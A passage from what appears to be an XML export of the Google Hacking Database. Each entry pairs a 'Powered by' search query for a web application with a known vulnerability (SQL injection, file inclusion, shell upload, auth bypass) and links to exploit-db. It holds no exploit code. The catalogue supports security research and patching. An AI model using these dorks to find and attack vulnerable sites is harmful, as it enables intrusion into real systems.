<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by Site Sift</shortDescription>
<textualDescription>Site Sift Listings (id) Remote SQL Injection Vulnerability - CVE: 2008-1869: https://www.exploit-db.com/exploits/5383</textualDescription>
<query>powered by Site Sift</query>
<querystring>https://www.google.com/search?q=powered+by+Site+Sift</querystring>
<edb>https://www.exploit-db.com/exploits/5383</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1761</id>
<link>https://www.exploit-db.com/ghdb/1761</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by SkaDate Dating</shortDescription>
<textualDescription>SkaDate Online 5.0/6.0 Remote File Disclosure Vulnerability - CVE: 2007-5299: https://www.exploit-db.com/exploits/4493</textualDescription>
<query>Powered by SkaDate Dating</query>
<querystring>https://www.google.com/search?q=Powered+by+SkaDate+Dating</querystring>
<edb>https://www.exploit-db.com/exploits/4493</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1868</id>
<link>https://www.exploit-db.com/ghdb/1868</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by SkaLinks</shortDescription>
<textualDescription>SkaLinks 1.5 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-0451: https://www.exploit-db.com/exploits/7932</textualDescription>
<query>Powered by SkaLinks</query>
<querystring>https://www.google.com/search?q=Powered+by+SkaLinks</querystring>
<edb>https://www.exploit-db.com/exploits/7932</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3265</id>
<link>https://www.exploit-db.com/ghdb/3265</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by SLAED CMS © 2005-2008 SLAED. All rights reserved.</shortDescription>
<textualDescription>Slaed CMS v4 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11596</textualDescription>
<query>Powered by SLAED CMS © 2005-2008 SLAED. All rights reserved.</query>
<querystring>https://www.google.com/search?q=Powered+by+SLAED+CMS+%C2%A9+2005-2008+SLAED.+All+rights+reserved.</querystring>
<edb>https://www.exploit-db.com/exploits/11596</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1798</id>
<link>https://www.exploit-db.com/ghdb/1798</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by SNETWORKS PHP CLASSIFIEDS</shortDescription>
<textualDescription>SNETWORKS PHP CLASSIFIEDS 5.0 Remote File Inclusion Vulnerability - CVE: 2008-0137: https://www.exploit-db.com/exploits/4838</textualDescription>
<query>Powered by SNETWORKS PHP CLASSIFIEDS</query>
<querystring>https://www.google.com/search?q=Powered+by+SNETWORKS+PHP+CLASSIFIEDS</querystring>
<edb>https://www.exploit-db.com/exploits/4838</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2494</id>
<link>https://www.exploit-db.com/ghdb/2494</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by sX-Shop</shortDescription>
<textualDescription>sX-Shop (view_image.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14557</textualDescription>
<query>powered by sX-Shop</query>
<querystring>https://www.google.com/search?q=powered+by+sX-Shop</querystring>
<edb>https://www.exploit-db.com/exploits/14557</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3182</id>
<link>https://www.exploit-db.com/ghdb/3182</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by TeamCal Pro</shortDescription>
<textualDescription>TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities - CVE: 2007-6553: https://www.exploit-db.com/exploits/4785</textualDescription>
<query>Powered by TeamCal Pro</query>
<querystring>https://www.google.com/search?q=Powered+by+TeamCal+Pro</querystring>
<edb>https://www.exploit-db.com/exploits/4785</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2990</id>
<link>https://www.exploit-db.com/ghdb/2990</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by TextAds 2.08</shortDescription>
<textualDescription>idevspot Text ads 2.08 sqli vulnerability - CVE: 2010-2319: https://www.exploit-db.com/exploits/13749</textualDescription>
<query>Powered by TextAds 2.08</query>
<querystring>https://www.google.com/search?q=Powered+by+TextAds+2.08</querystring>
<edb>https://www.exploit-db.com/exploits/13749</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2231</id>
<link>https://www.exploit-db.com/ghdb/2231</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by ThinkAdmin</shortDescription>
<textualDescription>ThinkAdmin (page.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11296</textualDescription>
<query>Powered by ThinkAdmin</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by+ThinkAdmin</querystring>
<edb>https://www.exploit-db.com/exploits/11296</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3353</id>
<link>https://www.exploit-db.com/ghdb/3353</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by UCenter 1.5.0 © 2001 - 2008 Comsenz Inc.</shortDescription>
<textualDescription>Ucenter Projekt 2.0 Insecure crossdomain (XSS) Vulnerability: https://www.exploit-db.com/exploits/12455</textualDescription>
<query>Powered by UCenter 1.5.0 © 2001 - 2008 Comsenz Inc.</query>
<querystring>https://www.google.com/search?q=Powered+by+UCenter+1.5.0+%C2%A9+2001+-+2008+Comsenz+Inc.</querystring>
<edb>https://www.exploit-db.com/exploits/12455</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1689</id>
<link>https://www.exploit-db.com/ghdb/1689</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by UCenter inurl:shop.php?ac=view</shortDescription>
<textualDescription>UCenter Home 2.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14997</textualDescription>
<query>Powered by UCenter inurl:shop.php?ac=view</query>
<querystring>https://www.google.com/search?q=Powered+by+UCenter+inurl:shop.php%3Fac%3Dview</querystring>
<edb>https://www.exploit-db.com/exploits/14997</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3048</id>
<link>https://www.exploit-db.com/ghdb/3048</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by UGiA PHP UPLOADER V0.2</shortDescription>
<textualDescription>UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11261</textualDescription>
<query>Powered by UGiA PHP UPLOADER V0.2</query>
<querystring>https://www.google.com/search?q=Powered+by+UGiA+PHP+UPLOADER+V0.2</querystring>
<edb>https://www.exploit-db.com/exploits/11261</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1443</id>
<link>https://www.exploit-db.com/ghdb/1443</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by v1.14 powered by philboard v1.14</shortDescription>
<textualDescription>W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5192: https://www.exploit-db.com/exploits/5958</textualDescription>
<query>Powered by v1.14 powered by philboard v1.14</query>
<querystring>https://www.google.com/search?q=Powered+by+v1.14+powered+by+philboard+v1.14</querystring>
<edb>https://www.exploit-db.com/exploits/5958</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1516</id>
<link>https://www.exploit-db.com/ghdb/1516</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by vBulletin 3.8.4</shortDescription>
<textualDescription>vBulletin 3.8.4 &amp; 3.8.5 Registration Bypass Vulnerability: https://www.exploit-db.com/exploits/14833</textualDescription>
<query>powered by vBulletin 3.8.4</query>
<querystring>https://www.google.com/search?q=powered+by+vBulletin+3.8.4</querystring>
<edb>https://www.exploit-db.com/exploits/14833</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3272</id>
<link>https://www.exploit-db.com/ghdb/3272</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by vBulletin 3.8.6</shortDescription>
<textualDescription>vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability: https://www.exploit-db.com/exploits/14455</textualDescription>
<query>powered by vBulletin 3.8.6</query>
<querystring>https://www.google.com/search?q=powered+by+vBulletin+3.8.6</querystring>
<edb>https://www.exploit-db.com/exploits/14455</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2703</id>
<link>https://www.exploit-db.com/ghdb/2703</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by vBulletin 4.0.4 </shortDescription>
<textualDescription>VBbuletin 4.0.4 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/14686</textualDescription>
<query>powered by vBulletin 4.0.4</query>
<querystring>https://www.google.com/search?q=+powered+by+vBulletin+4.0.4</querystring>
<edb>https://www.exploit-db.com/exploits/14686</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1772</id>
<link>https://www.exploit-db.com/ghdb/1772</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by vpasp v 6.50</shortDescription>
<textualDescription>VP-ASP Shopping Cart 6.50 Database Disclosure Vulnerability - CVE: 2008-5929: https://www.exploit-db.com/exploits/7438</textualDescription>
<query>powered by vpasp v 6.50</query>
<querystring>https://www.google.com/search?q=powered+by+vpasp+v+6.50</querystring>
<edb>https://www.exploit-db.com/exploits/7438</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1920</id>
<link>https://www.exploit-db.com/ghdb/1920</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by webit! cms</shortDescription>
<textualDescription>Webit Cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12744</textualDescription>
<query>powered by webit! cms</query>
<querystring>https://www.google.com/search?q=powered+by+webit!+cms</querystring>
<edb>https://www.exploit-db.com/exploits/12744</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2690</id>
<link>https://www.exploit-db.com/ghdb/2690</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Webiz</shortDescription>
<textualDescription>(Webiz) local SHELL Upload Vulnerability: https://www.exploit-db.com/exploits/12797</textualDescription>
<query>Powered by Webiz</query>
<querystring>https://www.google.com/search?q=Powered+by+Webiz</querystring>
<edb>https://www.exploit-db.com/exploits/12797</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1618</id>
<link>https://www.exploit-db.com/ghdb/1618</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Webiz inurl:'wmt/webpages'</shortDescription>
<textualDescription>(Webiz) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12798</textualDescription>
<query>Powered by Webiz inurl:'wmt/webpages</query>
<querystring>https://www.google.com/search?q=Powered+by+Webiz+inurl:'wmt/webpages</querystring>
<edb>https://www.exploit-db.com/exploits/12798</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2194</id>
<link>https://www.exploit-db.com/ghdb/2194</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By WebSihirbazı</shortDescription>
<textualDescription>WebSihirbazi 5.1.1 (pageid) Remote SQL Injection Vulnerability - CVE: 2007-6556: https://www.exploit-db.com/exploits/4777</textualDescription>
<query>Powered By WebSihirbazı</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+By+WebSihirbaz%C3%84%C2%B1</querystring>
<edb>https://www.exploit-db.com/exploits/4777</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2592</id>
<link>https://www.exploit-db.com/ghdb/2592</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by WebspotBlogging</shortDescription>
<textualDescription>bspotBlogging 3.0.1 (path) Remote File Include Vulnerability - CVE: 2006-2860: https://www.exploit-db.com/exploits/1871</textualDescription>
<query>Powered by WebspotBlogging</query>
<querystring>https://www.google.com/search?q=Powered+by+WebspotBlogging</querystring>
<edb>https://www.exploit-db.com/exploits/1871</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1635</id>
<link>https://www.exploit-db.com/ghdb/1635</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by WebStudio</shortDescription>
<textualDescription>WebStudio CMS (pageid) Remote Blind SQL Injection Vuln - CVE: 2008-5336: https://www.exploit-db.com/exploits/7236</textualDescription>
<query>Powered by WebStudio</query>
<querystring>https://www.google.com/search?q=Powered+by+WebStudio</querystring>
<edb>https://www.exploit-db.com/exploits/7236</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2569</id>
<link>https://www.exploit-db.com/ghdb/2569</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by WHMCompleteSolution - or inurl:WHMCS</shortDescription>
<textualDescription>WHMCS control (WHMCompleteSolution) Sql Injection - CVE: 2010-1702: https://www.exploit-db.com/exploits/12371</textualDescription>
<query>Powered by WHMCompleteSolution - or inurl:WHMCS</query>
<querystring>https://www.google.com/search?q=Powered+by+WHMCompleteSolution+-+or+++inurl:WHMCS</querystring>
<edb>https://www.exploit-db.com/exploits/12371</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2164</id>
<link>https://www.exploit-db.com/ghdb/2164</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by WHMCompleteSolution - OR inurl:WHMCS OR announcements.php</shortDescription>
<textualDescription>WHMCS Control 2 (announcements.php) SQL Injection: https://www.exploit-db.com/exploits/12481</textualDescription>
<query>Powered by WHMCompleteSolution - OR inurl:WHMCS OR announcements.php</query>
<querystring>https://www.google.com/search?q=Powered+by+WHMCompleteSolution+-+OR+++inurl:WHMCS+++OR+++++announcements.php</querystring>
<edb>https://www.exploit-db.com/exploits/12481</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3438</id>
<link>https://www.exploit-db.com/ghdb/3438</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by WikyBlog</shortDescription>
<textualDescription>WikyBlog v1.7.3rc2 Multiple Vulnerabilities - CVE: 2010-0754: https://www.exploit-db.com/exploits/11560</textualDescription>
<query>Powered by WikyBlog</query>
<querystring>https://www.google.com/search?q=Powered+by+WikyBlog</querystring>
<edb>https://www.exploit-db.com/exploits/11560</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2557</id>
<link>https://www.exploit-db.com/ghdb/2557</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by x7 chat 1.3.6b</shortDescription>
<textualDescription>X7CHAT v1.3.6b Add Admin: https://www.exploit-db.com/exploits/10931</textualDescription>
<query>powered by x7 chat 1.3.6b</query>
<querystring>https://www.google.com/search?q=powered+by+x7+chat+1.3.6b</querystring>
<edb>https://www.exploit-db.com/exploits/10931</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2183</id>
<link>https://www.exploit-db.com/ghdb/2183</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by XAOS systems</shortDescription>
<textualDescription>XAOS CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14469</textualDescription>
<query>Powered by XAOS systems</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by+XAOS+systems</querystring>
<edb>https://www.exploit-db.com/exploits/14469</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2883</id>
<link>https://www.exploit-db.com/ghdb/2883</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by XT-Commerce</shortDescription>
<textualDescription>XT-Commerce v1 Beta 1 by Pass / Creat and Download Backup Vulnerability: https://www.exploit-db.com/exploits/12447</textualDescription>
<query>Powered by XT-Commerce</query>
<querystring>https://www.google.com/search?q=Powered+by+XT-Commerce</querystring>
<edb>https://www.exploit-db.com/exploits/12447</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2354</id>
<link>https://www.exploit-db.com/ghdb/2354</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by YaBBSM V2.5.0 Based on YABB SE</shortDescription>
<textualDescription>YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability - CVE: 2006-5413: https://www.exploit-db.com/exploits/2553</textualDescription>
<query>Powered by YaBBSM V2.5.0 Based on YABB SE</query>
<querystring>https://www.google.com/search?q=Powered+by+YaBBSM+V2.5.0+Based+on+YABB+SE</querystring>
<edb>https://www.exploit-db.com/exploits/2553</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2146</id>
<link>https://www.exploit-db.com/ghdb/2146</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by zeeways</shortDescription>
<textualDescription>Zeeways Technology (product_desc.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11047</textualDescription>
<query>powered by zeeways</query>
<querystring>https://www.google.com/search?q=powered+by+zeeways</querystring>
<edb>https://www.exploit-db.com/exploits/11047</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2968</id>
<link>https://www.exploit-db.com/ghdb/2968</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Zylone IT</shortDescription>
<textualDescription>Zylone IT Multiple Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14270</textualDescription>
<query>Powered by Zylone IT</query>
<querystring>https://www.google.com/search?q=Powered+by+Zylone+IT</querystring>
<edb>https://www.exploit-db.com/exploits/14270</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2336</id>
<link>https://www.exploit-db.com/ghdb/2336</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By: 4images 1.7.1</shortDescription>
<textualDescription>4images 1.7.1 Remote SQL Injection Vulnerability - CVE: 2006-5236: https://www.exploit-db.com/exploits/10572</textualDescription>
<query>Powered By: 4images 1.7.1</query>
<querystring>https://www.google.com/search?q=Powered+By:+4images+1.7.1</querystring>
<edb>https://www.exploit-db.com/exploits/10572</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3239</id>
<link>https://www.exploit-db.com/ghdb/3239</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: AIH v2.1</shortDescription>
<textualDescription>Advanced Image Hosting (AIH) 2.1 Remote SQL Injection - CVE: 2008-2536: https://www.exploit-db.com/exploits/5601</textualDescription>
<query>Powered by: AIH v2.1</query>
<querystring>https://www.google.com/search?q=Powered+by:+AIH+v2.1</querystring>
<edb>https://www.exploit-db.com/exploits/5601</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3160</id>
<link>https://www.exploit-db.com/ghdb/3160</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: AIH v2.3</shortDescription>
<textualDescription>Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln - CVE: 2009-1032: https://www.exploit-db.com/exploits/8238</textualDescription>
<query>Powered by: AIH v2.3</query>
<querystring>https://www.google.com/search?q=Powered+by:+AIH+v2.3</querystring>
<edb>https://www.exploit-db.com/exploits/8238</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2844</id>
<link>https://www.exploit-db.com/ghdb/2844</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By: AJ Square Inc</shortDescription>
<textualDescription>AJ Article Persistent XSS Vulnerability - CVE: 2010-2917: https://www.exploit-db.com/exploits/14354</textualDescription>
<query>Powered By: AJ Square Inc</query>
<querystring>https://www.google.com/search?q=Powered+By%3A+AJ+Square+Inc</querystring>
<edb>https://www.exploit-db.com/exploits/14354</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2544</id>
<link>https://www.exploit-db.com/ghdb/2544</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Arab Portal inurl:mod.php?mod=html</shortDescription>
<textualDescription>Arab Portal 2.1 Remote File Disclosure Vulnerability - CVE: 2008-5787: https://www.exploit-db.com/exploits/7019</textualDescription>
<query>Powered by: Arab Portal inurl:mod.php?mod=html</query>
<querystring>https://www.google.com/search?q=Powered+by:+++Arab+Portal++inurl:mod.php%3Fmod%3Dhtml</querystring>
<edb>https://www.exploit-db.com/exploits/7019</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1933</id>
<link>https://www.exploit-db.com/ghdb/1933</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Con-Imedia</shortDescription>
<textualDescription>IMEDIA (index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12665</textualDescription>
<query>Powered by: Con-Imedia</query>
<querystring>https://www.google.com/search?q=Powered+by:+Con-Imedia</querystring>
<edb>https://www.exploit-db.com/exploits/12665</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2921</id>
<link>https://www.exploit-db.com/ghdb/2921</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: deonixscripts.com</shortDescription>
<textualDescription>Web Template Management System 1.3 Remote SQL Injection - CVE: 2007-5233: https://www.exploit-db.com/exploits/4482</textualDescription>
<query>Powered by: deonixscripts.com</query>
<querystring>https://www.google.com/search?q=Powered+by%3A+deonixscripts.com</querystring>
<edb>https://www.exploit-db.com/exploits/4482</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1532</id>
<link>https://www.exploit-db.com/ghdb/1532</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By: Forest Blog v1.3.2</shortDescription>
<textualDescription>Forest Blog 1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability - CVE: 2008-5780: https://www.exploit-db.com/exploits/7466</textualDescription>
<query>Powered By: Forest Blog v1.3.2</query>
<querystring>https://www.google.com/search?q=Powered+By:+Forest+Blog+v1.3.2</querystring>
<edb>https://www.exploit-db.com/exploits/7466</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1599</id>
<link>https://www.exploit-db.com/ghdb/1599</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Linkarityâ</shortDescription>
<textualDescription>Linkarity (link.php) Remote SQL Injection Vulnerability - CVE: 2008-4353: https://www.exploit-db.com/exploits/6455</textualDescription>
<query>Powered by: Linkarityâ</query>
<querystring>https://www.google.com/search?q=Powered+by:+Linkarity%C3%A2</querystring>
<edb>https://www.exploit-db.com/exploits/6455</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1742</id>
<link>https://www.exploit-db.com/ghdb/1742</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Maian Greetings v2.1</shortDescription>
<textualDescription>Maian Greetings 2.1 Insecure Cookie Handling Vulnerability - CVE: 2008-7086: https://www.exploit-db.com/exploits/6050</textualDescription>
<query>Powered by: Maian Greetings v2.1</query>
<querystring>https://www.google.com/search?q=Powered+by:+Maian+Greetings+v2.1</querystring>
<edb>https://www.exploit-db.com/exploits/6050</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1974</id>
<link>https://www.exploit-db.com/ghdb/1974</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Maian Links v3.1</shortDescription>
<textualDescription>Maian Links 3.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3319: https://www.exploit-db.com/exploits/6062</textualDescription>
<query>Powered by: Maian Links v3.1</query>
<querystring>https://www.google.com/search?q=Powered+by:+Maian+Links+v3.1</querystring>
<edb>https://www.exploit-db.com/exploits/6062</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1972</id>
<link>https://www.exploit-db.com/ghdb/1972</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Maian Recipe v1.2</shortDescription>
<textualDescription>Maian Recipe 1.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3322: https://www.exploit-db.com/exploits/6063</textualDescription>
<query>Powered by: Maian Recipe v1.2</query>
<querystring>https://www.google.com/search?q=Powered+by:+Maian+Recipe+v1.2</querystring>
<edb>https://www.exploit-db.com/exploits/6063</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1973</id>
<link>https://www.exploit-db.com/ghdb/1973</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Maian Search v1.1</shortDescription>
<textualDescription>Maian Search 1.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3317: https://www.exploit-db.com/exploits/6066</textualDescription>
<query>Powered by: Maian Search v1.1</query>
<querystring>https://www.google.com/search?q=Powered+by:+Maian+Search+v1.1</querystring>
<edb>https://www.exploit-db.com/exploits/6066</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2945</id>
<link>https://www.exploit-db.com/ghdb/2945</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Maian Uploader v4.0</shortDescription>
<textualDescription>Maian Uploader v4.0 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11571</textualDescription>
<query>Powered by: Maian Uploader v4.0</query>
<querystring>https://www.google.com/search?q=Powered+by%3A+Maian+Uploader+v4.0</querystring>
<edb>https://www.exploit-db.com/exploits/11571</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1975</id>
<link>https://www.exploit-db.com/ghdb/1975</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Maian Uploader v4.0</shortDescription>
<textualDescription>Maian Uploader 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3321: https://www.exploit-db.com/exploits/6065</textualDescription>
<query>Powered by: Maian Uploader v4.0</query>
<querystring>https://www.google.com/search?q=Powered+by:+Maian+Uploader+v4.0</querystring>
<edb>https://www.exploit-db.com/exploits/6065</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2281</id>
<link>https://www.exploit-db.com/ghdb/2281</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: mevin productions</shortDescription>
<textualDescription>Basic PHP Events Lister 2 Add Admin: https://www.exploit-db.com/exploits/10515</textualDescription>
<query>Powered by: mevin productions</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by:+mevin+productions</querystring>
<edb>https://www.exploit-db.com/exploits/10515</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1655</id>
<link>https://www.exploit-db.com/ghdb/1655</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: PhotoPost PHP 4.6</shortDescription>
<textualDescription>PhotoPost PHP SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14446</textualDescription>
<query>Powered by: PhotoPost PHP 4.6</query>
<querystring>https://www.google.com/search?q=Powered+by:+PhotoPost+PHP+4.6</querystring>
<edb>https://www.exploit-db.com/exploits/14446</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2543</id>
<link>https://www.exploit-db.com/ghdb/2543</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: PHPDirector 0.30 or nurl:videos.php?id=</shortDescription>
<textualDescription>PHPDirector 0.30 (videos.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14106</textualDescription>
<query>Powered by: PHPDirector 0.30 or nurl:videos.php?id=</query>
<querystring>https://www.google.com/search?q=Powered+by:+PHPDirector+0.30+or+nurl:videos.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/14106</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1611</id>
<link>https://www.exploit-db.com/ghdb/1611</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: PreProjects</shortDescription>
<textualDescription>Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13996</textualDescription>
<query>Powered by: PreProjects</query>
<querystring>https://www.google.com/search?q=Powered+by:+PreProjects</querystring>
<edb>https://www.exploit-db.com/exploits/13996</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2267</id>
<link>https://www.exploit-db.com/ghdb/2267</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: XP Book v3.0</shortDescription>
<textualDescription>XP Book v3.0 login Admin: https://www.exploit-db.com/exploits/10621</textualDescription>
<query>Powered by: XP Book v3.0</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by:+XP+Book+v3.0</querystring>
<edb>https://www.exploit-db.com/exploits/10621</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2190</id>
<link>https://www.exploit-db.com/ghdb/2190</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Zanfi Solutions</shortDescription>
<textualDescription>Zanfi CMS lite 1.2 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-4158: https://www.exploit-db.com/exploits/6413</textualDescription>
<query>Powered by: Zanfi Solutions</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by:+Zanfi+Solutions</querystring>
<edb>https://www.exploit-db.com/exploits/6413</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2368</id>
<link>https://www.exploit-db.com/ghdb/2368</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by: Zanfi Solutions</shortDescription>
<textualDescription>Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability - CVE: 2008-4159: https://www.exploit-db.com/exploits/6423</textualDescription>
<query>Powered by: Zanfi Solutions</query>
